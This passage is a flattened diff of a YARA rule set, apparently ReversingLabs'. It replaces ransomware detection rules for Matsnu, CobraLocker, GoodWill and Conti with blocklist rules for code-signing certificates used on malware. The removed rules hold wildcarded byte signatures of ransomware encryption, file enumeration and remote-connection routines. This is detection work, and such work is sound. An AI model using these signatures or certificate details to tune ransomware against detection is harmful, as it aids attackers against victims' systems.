"091d00b0731f0a3d9917eee945249f001e4b5b1b603cad2fc21eed70ec86aa99" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Matsnu" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection = { - 55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C6 45 ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B 8D 83 ?? ?? ?? ?? 8B 00 6A ?? 50 - FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D 7D ?? 57 56 FF 93 ?? ?? ?? ?? 85 C0 74 - ?? 57 8D BB ?? ?? ?? ?? 89 07 5F EB ?? 8D B3 ?? ?? ?? ?? 8B 36 57 8D BB ?? ?? ?? ?? - 89 37 5F 68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? EB ?? 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A - ?? 57 FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 - 57 FF 93 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 50 57 FF 93 ?? ?? ?? ?? 85 - C0 74 ?? C6 00 ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8D 93 ?? ?? - ?? ?? FF 75 ?? 52 51 56 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 4D ?? 51 57 E8 ?? - ?? ?? ?? 85 C0 74 ?? 89 45 ?? 8D 4D ?? 51 50 E8 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF - 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 89 85 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? - ?? 8B 45 ?? 8B 75 ?? 89 06 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 83 BD ?? - ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - 68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D 83 ?? ?? ?? ?? 50 56 FF - 93 ?? ?? ?? ?? 85 C0 74 ?? 40 57 8D BB ?? ?? ?? ?? 89 07 5F E9 ?? ?? ?? ?? 8D B3 ?? - ?? ?? ?? 8B 36 57 8D BB ?? ?? ?? ?? 89 37 5F 68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? E9 ?? - ?? ?? ?? 8D 83 ?? ?? ?? ?? 8B 00 50 FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? - ?? ?? C9 C2 - } - $crypto_file = { - 55 89 E5 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? - C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? E8 - ?? ?? ?? ?? 5B 8D 83 ?? ?? ?? ?? 8B 00 85 C0 74 ?? 89 45 ?? 8D 83 ?? ?? ?? ?? 8B 00 - 85 C0 74 ?? 8D 7D ?? 8D 75 ?? 8D 4D ?? 51 56 57 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? - 89 45 ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? FF 75 ?? - FF 93 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? 8B 45 - ?? 8B 5D ?? C9 C2 - } - $crypt_file = { - 55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 5B 8D BD ?? ?? ?? ?? FF 75 ?? 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D B3 ?? ?? ?? - ?? 56 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 93 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 30 FF 93 ?? - ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 4D ?? 8D 85 ?? ?? ?? ?? 6A ?? - FF 31 50 FF 36 FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 8D B5 ?? ?? ?? ?? 51 6A ?? FF 36 68 ?? ?? ?? ?? FF 30 FF 93 ?? ?? ?? ?? 85 - C0 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 89 45 - ?? 6A ?? FF 75 ?? FF 93 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF - 75 ?? FF 93 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 45 ?? 8D 7D ?? 8D 75 ?? 8D 55 - ?? 52 56 57 FF 75 ?? FF 93 ?? ?? ?? ?? 8B 45 ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D - 45 ?? 6A ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - FF 75 ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 - ?? FF 75 ?? E8 ?? ?? ?? ?? 8D 7D ?? 8D B5 ?? ?? ?? ?? FF 75 ?? 57 FF 75 ?? 6A ?? 6A - ?? 6A ?? FF 36 FF 93 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? - ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 45 ?? 8D 45 ?? 6A ?? 50 FF 75 ?? - FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 85 C0 74 ?? 8D 7D ?? 8D 75 ?? 8D 55 ?? 52 56 57 - FF 75 ?? FF 93 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D B3 ?? - ?? ?? ?? FF 06 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 93 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 50 FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 50 FF 93 ?? ?? ?? ?? - 83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2 - } - $enum_files_1 = { - 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B E8 ?? - ?? ?? ?? 8D 7D ?? 6A ?? FF 75 ?? 57 FF 93 ?? ?? ?? ?? 8D 7D ?? 57 FF 93 ?? ?? ?? ?? - 83 F8 ?? 74 ?? EB ?? 8D 75 ?? 56 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2 - } - $enum_files_2 = { - 55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? - 66 C7 45 ?? ?? ?? C6 45 ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B 83 7D ?? ?? 0F 84 - ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 C0 ?? 89 45 ?? 40 50 6A ?? FF 93 ?? ?? ?? - ?? 85 C0 0F 84 ?? ?? ?? ?? 89 45 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8D 75 ?? 56 - FF 75 ?? FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 75 ?? FF 93 ?? ?? ?? ?? 83 F8 ?? - 0F 84 ?? ?? ?? ?? 89 45 ?? 6A ?? FF 93 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 55 ?? 8D B5 - ?? ?? ?? ?? 52 56 FF 93 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 55 ?? 8D B5 ?? ?? ?? ?? 52 - 56 FF 93 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 40 89 45 ?? 8D BD - ?? ?? ?? ?? 57 FF 93 ?? ?? ?? ?? 03 45 ?? 89 45 ?? 40 50 6A ?? FF 93 ?? ?? ?? ?? 85 - C0 0F 84 ?? ?? ?? ?? 89 45 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8D 75 ?? 56 FF 75 - ?? FF 93 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 56 FF 75 ?? FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? A9 ?? ?? ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? E8 ?? ?? ?? ?? - EB ?? 8D B5 ?? ?? ?? ?? FF 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 - ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 75 ?? FF 93 ?? ?? - ?? ?? 85 C0 74 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF - 75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74 - ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2 - } - condition: - uint16(0)==0x5A4D and $enum_files_1 and $enum_files_2 and $crypto_file and $crypt_file and $remote_connection + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HANNAH SISK LIMITED" and pe.signatures[i].serial=="06:3d:cd:7d:7b:0b:c7:7c:ac:84:4c:72:13:be:39:89" and 1656892801<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Cobralocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6F8777Aa866142Ad7120E5E1C9321E37 : INFO FILE { meta: - description = "Yara rule that detects CobraLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "dada6370-3ae3-5931-ba9f-da56ebbcd8c8" - date = "2021-08-12" - modified = "2021-08-12" + id = "ace8a8b4-5288-56c4-bd47-9eb42ea41ecb" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Bytecode.MSIL.Ransomware.CobraLocker.yara#L1-L59" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "95f4c645c7c237d23b5028f824f78a5f9f8f0a4737b391d877582afe08264d7e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12554-L12570" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ca3ff0c7192ba90932d35d053712816555dea051ce15d29a7ccf4e37da989899" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "CobraLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files = { - 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 00 73 ?? - ?? ?? ?? 0D 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 - 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? - ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 - 09 17 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 02 16 02 - 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DD ?? ?? ?? ?? 11 ?? 38 ?? ?? ?? ?? - 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 08 6F ?? ?? ?? ?? 0A 00 DD ?? - ?? ?? ?? 09 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 00 DC 00 DD - ?? ?? ?? ?? 08 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 00 DC 06 - 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 11 ?? 2A - } - $find_files = { - 16 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 0C 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 06 72 ?? - ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 08 72 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? - ?? ?? ?? 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 - 28 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? - 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 - FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? - ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? - ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 - ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? - 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? - ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? - 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? - ?? ?? 3A ?? ?? ?? ?? 2A - } - condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CLOUD SOFTWARE LINE CO., LTD." and pe.signatures[i].serial=="6f:87:77:aa:86:61:42:ad:71:20:e5:e1:c9:32:1e:37" and 1629676800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Goodwill : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_4A7F07C5D4Ad2E23F9E8E03F0E229Dd4 : INFO FILE { meta: - description = "Yara rule that detects GoodWill ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "66358802-450b-5276-8088-b3550519b1e8" - date = "2022-06-28" - modified = "2022-06-28" + id = "76be58d9-d1a3-5dec-807e-941714be80f9" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.GoodWill.yara#L1-L89" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "94e2950f415ba737fe5ca9d32a3d850dd5744e547c4ca094ad28545e19033cb2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12572-L12588" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6dc2bfac77117e294cacc772f7bfaea8b2e3caa26a0afd3729d517e91ca20ea5" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "GoodWill" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_file = { - 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F - ?? ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 0B 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 02 72 ?? ?? ?? - ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 07 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ?? 26 72 ?? - ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 2A - } - $aes_encrypt = { - 14 0A 03 0B 73 ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 - ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? - ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? - ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ?? ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? - 11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? - ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? - ?? ?? ?? DC 06 2A - } - $find_files_p1 = { - 28 ?? ?? ?? ?? 0A 1F ?? 28 ?? ?? ?? ?? 0B 18 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 - 17 72 ?? ?? ?? ?? A2 0C 06 0D 16 13 ?? 38 ?? ?? ?? ?? 09 11 ?? 9A 13 ?? 11 ?? 6F ?? ?? - ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 - ?? 28 ?? ?? ?? ?? 08 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 28 ?? ?? - ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 28 ?? ?? ?? - ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ?? - ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ?? - ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? - ?? DC DE ?? 26 DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? - ?? ?? ?? DC 11 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? - 11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? - ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? - DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? - 8E 69 3F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 09 8E 69 3F ?? ?? ?? ?? 08 - } - $find_files_p2 = { - 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 07 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 - ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? - 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? FE 06 ?? ?? - ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? - 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26 - DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 07 11 ?? 28 - ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? - 7D ?? ?? ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ?? - ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F - ?? ?? ?? ?? DC DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A - } - $remote_connection = { - 73 ?? ?? ?? ?? 0A 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 17 28 ?? ?? ?? - ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 1C 6F ?? ?? ?? ?? 2B ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? - 1C 6F ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 17 0B DE ?? 26 72 ?? ?? ?? ?? - 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 07 2A - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_file) and ($aes_encrypt) and ($remote_connection) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Danalis LLC" and pe.signatures[i].serial=="4a:7f:07:c5:d4:ad:2e:23:f9:e8:e0:3f:0e:22:9d:d4" and 1608681600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Conti : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_F5F9C8F8C33E4Ce84Dd48Fcb03Ccb075 : INFO FILE { meta: - description = "Yara rule that detects Conti ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "548b8836-83cb-560c-af5f-33bdb24d15ed" - date = "2020-12-14" - modified = "2020-12-14" + id = "74203aa1-e5d0-59d9-b9f8-b79f5fbe271e" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Conti.yara#L1-L74" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4f2b96c8eaf8d112a7bb60647db49616935a336396c705d39d5bb51dfd90c60b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12590-L12608" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ac3bab3f5a93099f39b0862b419346d1eb3d0f75d86e121ba30626d496c46c57" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name 